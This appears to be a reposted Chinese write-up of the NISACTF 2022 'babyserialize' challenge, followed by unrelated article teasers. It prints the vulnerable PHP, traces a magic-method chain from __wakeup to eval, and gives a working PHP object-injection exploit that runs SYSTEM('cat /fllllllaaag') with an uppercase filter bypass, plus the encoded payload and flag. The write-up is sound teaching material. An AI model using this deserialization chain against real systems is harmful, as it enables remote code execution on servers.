[NISACTF 2022]babyserialize

news2024/11/23 4:38:33

[NISACTF 2022]babyserialize        题目做法及思路解析(个人分享)

题目平台地址:NSSCTF | 在线CTF平台


一、题目代码

查看分析代码,寻找漏洞点(题目中注释为个人思路标注,实际代码中没有)

<?php
include "waf.php";
class NISA{
    public $fun="show_me_flag";
    public $txw4ever;                           //2.给$txw4ever赋值需要执行的系统命令
    public function __wakeup()
    {
        if($this->fun=="show_me_flag"){
            hint();
        }
    }

    function __call($from,$val){
        $this->fun=$val[0];
    }

    public function __toString()
    {
        echo $this->fun;
        return " ";
    }
    public function __invoke()                  //3.触发invoke(触发条件:把对象当成函数)
    {
        checkcheck($this->txw4ever);
        @eval($this->txw4ever);                 //1.目标:触发eval执行系统代码
    }
}

class TianXiWei{
    public $ext;
    public $x;
    public function __wakeup()                  //11.触发wakeup(触发条件:反序列化之前会触发)
    {
        $this->ext->nisa($this->x);             //10.给$ext赋值为对象,即$ext成为对象Ilovetxw,调用不存在的nisa方法和参数,触发Ilovetxw中的call
    }
}

class Ilovetxw{
    public $huang;
    public $su;

    public function __call($fun1,$arg){         //9.触发call(触发条件:调用不存在的方法的名称和参数)
        $this->huang->fun=$arg[0];              //8.给$huang赋值为对象,即$huang成为对象four,给不存在的fun属性赋值,触发four中的set
    }

    public function __toString(){               //5.触发toString(触发条件:把对象当做字符串)
        $bb = $this->su;                        //4.给$su赋值为对象,即$bb成为对象NISA,却被当成函数调用,触发Modifier中的invoke
        return $bb();
    }
}

class four{
    public $a="TXW4EVER";
    private $fun='abc';

    public function __set($name, $value)        //7.触发set(触发条件:给不存在的成员属性赋值)
    {
        $this->$name=$value;
        if ($this->fun = "sixsixsix"){            //注意需要让fun = "sixsixsix"才能直接后续代码
            strtolower($this->a);               //6.给$a赋值为对象,即把对象Ilovetxw当做字符串进行大小写转换,触发Ilovetxw中的toString
        }
    }
}

if(isset($_GET['ser'])){
    @unserialize($_GET['ser']);
}else{
    highlight_file(__FILE__);
}

//func checkcheck($data){
//  if(preg_match(......)){
//      die(something wrong);
//  }
//}

//function hint(){
//    echo ".......";
//    die();
//}
?>

二、题目解析

1.解题思路

第一步:给$fun赋值要执行的代码,触发invoke

第二步:触发toString,给$su赋值为对象NISA

第三步:触发set,给$a赋值为对象Ilovetxw

第四步:触发call,给$huang赋值为对象four

第五步:触发wakeup,给$ext赋值为对象Ilovetxw

2.解题代码编写思路

1.查看题目注释代码(一般题目中注释代码存在提示信息),模糊掉了一部分,但是根据题目代码联想能够大概猜测,checkcheck()做了代码过滤,而hint()会终止程序

//func checkcheck($data){
//  if(preg_match(......)){
//      die(something wrong);
//  }
//}

//function hint(){
//    echo ".......";
//    die();
//}

2.直接将题目代码复制到本地,删除掉注释信息、方法、和属性的赋值(因为在我们编写解题代码时大部分时候用不到方法,而属性的赋值是由我们定义的,后面我们会重新赋值,所以把不重要的信息先删除掉)。

观察题目中执行反序列化的代码,会判断我们通过GET传参传递的ser参数,否则输出题目代码,将该段代码删除,替换为输出序列化的代码(注意当题目中存在private和protected修饰符时需要使用urlencode()函数进行URL编码加密,或后续手动更改输出结果)

<?php
class NISA{
    public $fun;
    public $txw4ever;
}
class TianXiWei{
    public $ext;
    public $x;
}
class Ilovetxw{
    public $huang;
    public $su;
}
class four{
    public $a;
    private $fun;
}
echo urlencode(serialize());
?>

3.首先,将四个对象先实例化,分别为$a、$b、$c、$d,此时我们再根据先前对题目的分析对代码进行编写(具体分析查看 题目代码 中进行注释的解析以及 解题思路 中的分析),得到解题代码。

strtolower()函数是一种常见的字符串处理函数,用于将字符串中的所有字符转换为小写形式。它的主要作用是实现字符串的大小写转换,将大写字母转换为相应的小写字母。

<?php
class NISA{
    public $fun;
    public $txw4ever = "phpinfo();";         //给$fun赋值要执行的代码,我们先使用phpinfo()进行测试
}
class TianXiWei{
    public $ext;
    public $x;
}
class Ilovetxw{
    public $huang;
    public $su;
}
class four{
    public $a;
    private $fun = "sixsixsix";             //需要让fun="sixsixsix"才能执行大小写转换的代码
}
$a = new NISA();
$b = new TianXiWei();
$c = new Ilovetxw();
$d = new four();
$c -> su = $a;                              //给$su赋值为对象NISA,触发invoke
$d ->a = $c;                                //给$a赋值为对象Ilovetxw,触发toString
$c ->huang = $d;                            //给$huang赋值为对象four,触发set
$b ->ext = $c;                              //给$ext赋值为对象Ilovetxw,触发call
echo urlencode(serialize($b));              //执行反序列化,触发wakeup
?>

4.将序列化代码通过ser参数传入后产生报错,根据之前对题目代码进行的分析,猜测对参数进行了过滤,尝试使用大写绕过,最终成功回显

三、解题代码

通过system()函数执行系统命令对flag文件进行读取,得到flag(注意使用大写绕过)。

<?php
class NISA{
    public $fun;
    public $txw4ever = "SYSTEM('cat /fllllllaaag');";         //给$fun赋值要执行的代码,执行查看flag文件命令
}
class TianXiWei{
    public $ext;
    public $x;
}
class Ilovetxw{
    public $huang;
    public $su;
}
class four{
    public $a;
    private $fun = "sixsixsix";             //需要让fun="sixsixsix"才能执行大小写转换的代码
}
$a = new NISA();
$b = new TianXiWei();
$c = new Ilovetxw();
$d = new four();
$c -> su = $a;                              //给$su赋值为对象NISA,触发invoke
$d ->a = $c;                                //给$a赋值为对象Ilovetxw,触发toString
$c ->huang = $d;                            //给$huang赋值为对象four,触发set
$b ->ext = $c;                              //给$ext赋值为对象Ilovetxw,触发call
echo urlencode(serialize($b));              //执行反序列化,触发wakeup
?>

输出结果:

O%3A9%3A%22TianXiWei%22%3A2%3A%7Bs%3A3%3A%22ext%22%3BO%3A8%3A%22Ilovetxw%22%3A2%3A%7Bs%3A5%3A%22huang%22%3BO%3A4%3A%22four%22%3A2%3A%7Bs%3A1%3A%22a%22%3Br%3A2%3Bs%3A9%3A%22%00four%00fun%22%3Bs%3A9%3A%22sixsixsix%22%3B%7Ds%3A2%3A%22su%22%3BO%3A4%3A%22NISA%22%3A2%3A%7Bs%3A3%3A%22fun%22%3BN%3Bs%3A8%3A%22txw4ever%22%3Bs%3A27%3A%22SYSTEM%28%27cat+%2Ffllllllaaag%27%29%3B%22%3B%7D%7Ds%3A1%3A%22x%22%3BN%3B%7D

FLAG:

NSSCTF{a155432b-5656-4b9b-9a6e-9fd7160219c1}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1326699.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

每日一题,二维平面

给你 二维 平面上两个 由直线构成且边与坐标轴平行/垂直 的矩形&#xff0c;请你计算并返回两个矩形覆盖的总面积。 每个矩形由其 左下 顶点和 右上 顶点坐标表示&#xff1a; 第一个矩形由其左下顶点 (ax1, ay1) 和右上顶点 (ax2, ay2) 定义。 第二个矩形由其左下顶点 (bx1, …

牛客小白月赛78(C: 第K小表示数)

C-第K小表示数_牛客小白月赛78 (nowcoder.com) 问题&#xff1a; 分析: k的极限是1e6,因此要几乎O(n)的时间复杂度给求出来&#xff0c;还需要每插入一个元素我都要去排序&#xff0c;这个时候set就派上用场了&#xff0c;自带排序和去重,集合里面最小和第二小的一定是min(a…

LeetCode 647回文子串 517最长回文子序列 | 代码随想录25期训练营day57

动态规划算法14 LeetCode 647 回文子串 2023.12.20 题目链接代码随想录讲解[链接] int countSubstrings(string s) {//暴力搜索&#xff0c;前两层遍历确定子字符串的起始和末尾位置//第三层循环判断当前子字符串是否为回文串/*int result 0;for (int i 0; i < s.size…

【hadoop】解决浏览器不能访问Hadoop的50070、8088等端口?!

【hadoop】解决浏览器不能访问Hadoop的50070、8088等端口&#xff1f;&#xff01;&#x1f60e; 前言&#x1f64c;【hadoop】解决浏览器不能访问Hadoop的50070、8088等端口&#xff1f;&#xff01;查看自己的配置文件&#xff1a;最终成功访问如图所示&#xff1a; 总结撒花…

Best script for images porter 【容器镜像搬运最佳脚本】

文章目录 1. 简介2. 功能3. 代码4. 示例4.1 拉取 kube-prometheus-stack 55.4.1 版本的镜像 1. 简介 很多情况下&#xff0c;针对一个项目会有很多镜像需要搬运&#xff0c;打包&#xff0c;解压&#xff0c;打标签&#xff0c;推送入库。该项目将针对多个镜像进行管理操作。方…

vscode配置node.js调试环境

node.js基于VSCode的开发环境的搭建非常简单。 说明&#xff1a;本文的前置条件是已安装好node.js(具体安装不再赘述&#xff0c;如有需要可评论区留言)。 阅读本文可掌握&#xff1a; 方便地进行js单步调试&#xff1b;方便地查看内置的对象或属性&#xff1b; 安装插件 C…

GEE:如何解决随机森林分类器的确定性伪随机性?使得每次运行结果(OA、Kappa和混淆矩阵等)不一样

作者:CSDN @ _养乐多_ 在使用 Google Earth Engine(GEE)平台进行土地利用分类时,我们采用了随机森林分类器。理论上,由于该算法的随机性,每次运行后的分类结果应该是不同的。然而,我们在实际应用中却观察到每次运行后总体精度OA值和Kappa值都呈现出完全相同的结果。 这…

云原生消息流系统 Apache Pulsar 在腾讯云的大规模生产实践

导语 由 InfoQ 主办的 Qcon 全球软件开发者大会北京站上周已精彩落幕&#xff0c;腾讯云中间件团队的冉小龙参与了《云原生机构设计与音视频技术应用》专题&#xff0c;带来了以《云原生消息流系统 Apache Pulsar 在腾讯云的大规模生产实践》为主题的精彩演讲&#xff0c;在本…

Qt中多线程使用案列

Qt中多线程下载大文件 #pragma once#include <QWidget> #include <QPushButton> #include "ThreadPool.h" #include <QProgressBar> #include <QLabel> #include <QHBoxLayout> #include <QVBoxLayout> class MainWindow : pub…

Matlab论文插图绘制模板第131期—函数等高线图

在之前的文章中&#xff0c;分享了Matlab函数折线图的绘制模板&#xff1a; 函数三维折线图&#xff1a; 函数网格曲面图&#xff1a; 函数曲面图&#xff1a; 进一步&#xff0c;再来分享一下函数等高线图。 先来看一下成品效果&#xff1a; 特别提示&#xff1a;本期内容『数…

(9)Linux Git的介绍以及缓冲区

&#x1f4ad; 前言 本章我们先对缓冲区的概念进行一个详细的探究&#xff0c;之后会带着大家一步步去编写一个简陋的 "进度条" 小程序。最后我们来介绍一下 Git&#xff0c;着重讲解一下 Git 三板斧&#xff0c;一般只要掌握三板斧就基本够用了。 缓冲区&#xff…

PostgresSQL数据库中分区和分表的区别以及PostgresSQL创建表分区分表示例

1.分区分表理解 数据库分区和分表都是数据库中常用的数据分散存储技术&#xff0c;但它们的实现方式和应用场景有所不同。 分表&#xff1a;将一个大的表拆分成多个小的表&#xff0c;每个子表存储一部分数据。分表可以减轻单个表的数据量&#xff0c;提高查询效率&#xff0c…

系统架构设计师教程(八)系统质量属性与架构评估

系统质量属性与架构评估 8.1 软件系统质量属性8.1.1 质量属性概念开发期质量属性运行期质量属性 8.1.2 面向架构评估的质量属性8.1.3 质量属性场景描述 8.2 系统架构评估8.2.1 系统架构评估中的重要概念8.2.2 系统架构评估方法SAAM 方法ATAM方法CBAM 方法其他方法 8.3 ATAM方法…

C++继承与派生——(2)派生类

归纳编程学习的感悟&#xff0c; 记录奋斗路上的点滴&#xff0c; 希望能帮到一样刻苦的你&#xff01; 如有不足欢迎指正&#xff01; 共同学习交流&#xff01; &#x1f30e;欢迎各位→点赞 &#x1f44d; 收藏⭐ 留言​&#x1f4dd; 缺乏明确的目标&#xff0c;一生将庸庸…

内网渗透:拿下一台内网主机后如何继续攻击拿下域控主机

目录 #### 域的定义&#xff1a;将网络中的多台计算机在逻辑上组织到一起&#xff0c;进行集中管理。 域控攻击目标 1. 判断当前主机是否在域中 windows系统的三种登录方式 NTLM协议 从上篇文章拿下10.0.1.4这台服务器后&#xff0c;发展对内网进行攻击&#xff0c;打穿这…

[SWPUCTF 2021 新生赛]easy_md5

打开环境 这儿考弱比较&#xff0c;之前的WP里写过绕过方法&#xff0c;这儿我们直接数组绕过 构造GET传参name[]123 , POST传参password[]456得到flag

在区块链中看CHAT的独特见解

问CHAT&#xff1a;谈谈对区块链以及区块链金融的理解 CHAT回复&#xff1a;区块链是一种去中心化的分布式数据库技术&#xff0c;这种技术通过加密算法&#xff0c;使数据在网络中传输和存储的过程变得更加安全可靠。区块链的出现引领了存储、交易等形式的革命&#xff0c;改变…

SSH无密登陆配置

1 SSH介绍 ssh命令用于远程登录到其他计算机&#xff0c;实现安全的远程管理。 基本语法&#xff1a; ssh 域名/IP地址 示例&#xff1a; &#xff08;1&#xff09;从hadoop100服务器上远程连接hadoop101服务器 [hadoophadoop100 ~]$ ssh hadoop101 如果出现如下内容 Ar…

【科技前沿】数字孪生技术改革智慧供热,换热站3D可视化引领未来

换热站作为供热系统不可或缺的一部分&#xff0c;其能源消耗对城市环保至关重要。在双碳目标下&#xff0c;供热企业可通过搭建智慧供热系统&#xff0c;实现供热方式的低碳、高效、智能化&#xff0c;从而减少碳排放和能源浪费。通过应用物联网、大数据等高新技术&#xff0c;…

Mac如何搭建本地服务器

苹果电脑Mac OS X系统自带了Apache服务器 打开终端 //开启apache&#xff1a;sudo apachectl start //重启apache&#xff1a;sudo apachectl restart //关闭apache&#xff1a;sudo apachectl stop在浏览器输入127.0.10.1 &#xff0c; 如果页面出现 it works&#xff0c;则…